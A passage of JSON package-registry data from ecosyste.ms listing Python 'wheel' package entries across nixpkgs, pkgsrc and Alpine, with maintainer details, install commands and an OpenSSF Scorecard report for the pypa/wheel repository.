Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":28,"html_url":null,"role":null,"created_at":"2026-03-09T06:20:12.687Z","updated_at":"2026-03-09T06:20:12.687Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":283},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-06-10T05:16:24.031Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":13200891,"name":"python311Packages.wheel","ecosystem":"nixpkgs","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T00:47:54.865Z","latest_release_published_at":"2026-02-02T00:47:54.865Z","latest_release_number":"0.43.0","last_synced_at":"2026-05-13T01:07:53.318Z","created_at":"2026-02-02T00:47:44.091Z","updated_at":"2026-05-13T01:32:54.090Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=python311Packages.wheel","install_command":"nix-env -iA nixpkgs.python311Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/python-modules/wheel/default.nix#L35","metadata":{"nix_attribute":"python3.11-wheel-0.43.0","position":"pkgs/development/python-modules/wheel/default.nix:35","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.wheel?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":25,"html_url":null,"role":null,"created_at":"2026-03-07T10:02:34.397Z","updated_at":"2026-03-07T10:02:34.397Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":264},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-06-09T05:04:49.559Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":12835564,"name":"python311Packages.wheel","ecosystem":"nixpkgs","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T20:51:40.315Z","latest_release_published_at":"2026-01-26T20:51:40.315Z","latest_release_number":"0.38.4","last_synced_at":"2026-03-05T19:38:38.322Z","created_at":"2026-01-26T20:51:40.077Z","updated_at":"2026-03-05T19:38:38.616Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=python311Packages.wheel","install_command":"nix-env -iA nixpkgs.python311Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/python-modules/wheel/default.nix#L41","metadata":{"nix_attribute":"python3.11-wheel-0.38.4","position":"pkgs/development/python-modules/wheel/default.nix:41","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{},"purl":"pkg:nix/python311Packages.wheel?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":25,"html_url":null,"role":null,"created_at":"2026-03-05T19:38:38.501Z","updated_at":"2026-03-05T19:38:38.501Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":183},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-06-10T05:16:22.193Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":13300951,"name":"python310Packages.wheel","ecosystem":"nixpkgs","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T06:44:10.228Z","latest_release_published_at":"2026-02-02T06:44:10.228Z","latest_release_number":"0.41.1","last_synced_at":"2026-03-05T20:51:39.964Z","created_at":"2026-02-02T06:44:02.896Z","updated_at":"2026-03-05T21:15:41.175Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=python310Packages.wheel","install_command":"nix-env -iA nixpkgs.python310Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/python-modules/wheel/default.nix#L36","metadata":{"nix_attribute":"python3.10-wheel-0.41.1","position":"pkgs/development/python-modules/wheel/default.nix:36","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python310Packages.wheel?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python310Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python310Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python310Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages/python310Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":25,"html_url":null,"role":null,"created_at":"2026-03-05T20:51:40.223Z","updated_at":"2026-03-05T20:51:40.223Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-23.11","url":"https://channels.nixos.org/nixos-23.11","ecosystem":"nixpkgs","default":false,"packages_count":108178,"maintainers_count":2997,"namespaces_count":0,"keywords_count":569,"github":"NixOS","metadata":{"funded_packages_count":229},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.577Z","updated_at":"2026-06-10T05:16:53.702Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.11/namespaces"}},{"id":14528101,"name":"devel/py-wheel","ecosystem":"pkgsrc","description":"Tool for manipulating Python wheel files","homepage":"https://github.com/pypa/wheel","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["devel","python"],"namespace":"devel","versions_count":1,"first_release_published_at":"2026-03-06T19:37:22.000Z","latest_release_published_at":"2026-03-06T19:37:22.000Z","latest_release_number":"0.46.3","last_synced_at":"2026-05-27T06:43:52.701Z","created_at":"2026-05-27T06:43:52.415Z","updated_at":"2026-05-27T06:43:53.529Z","registry_url":"https://pkgsrc.se/devel/py-wheel","install_command":"pkg_add py311-wheel","documentation_url":"https://pkgsrc.se/devel/py-wheel","metadata":{"pkg_slug":"py-wheel","pkgbase":"py311-wheel","machine_arch":"x86_64","opsys":"NetBSD","pkgname_latest":"py311-wheel-0.46.3"},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-27T06:43:53.501Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:pkgsrc/devel/py-wheel?arch=x86_64\u0026os=NetBSD","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pkgsrc/devel/py-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pkgsrc/devel/py-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pkgsrc/devel/py-wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-wheel/codemeta","maintainers":[],"registry":{"name":"pkgsrc-netbsd-x86_64-10.1-all","url":"https://cdn.netbsd.org/pub/pkgsrc/packages/NetBSD/x86_64/10.1/All","ecosystem":"pkgsrc","default":true,"packages_count":19499,"maintainers_count":0,"namespaces_count":42,"keywords_count":308,"github":"pkgsrc","metadata":{"funded_packages_count":48},"icon_url":"https://github.com/pkgsrc.png","created_at":"2026-05-26T08:59:24.518Z","updated_at":"2026-06-09T05:04:46.058Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/namespaces"}},{"id":7767319,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_number":"0.40.0-r1","last_synced_at":"2026-04-08T18:07:20.244Z","created_at":"2023-05-22T11:24:33.397Z","updated_at":"2026-04-08T18:07:20.245Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p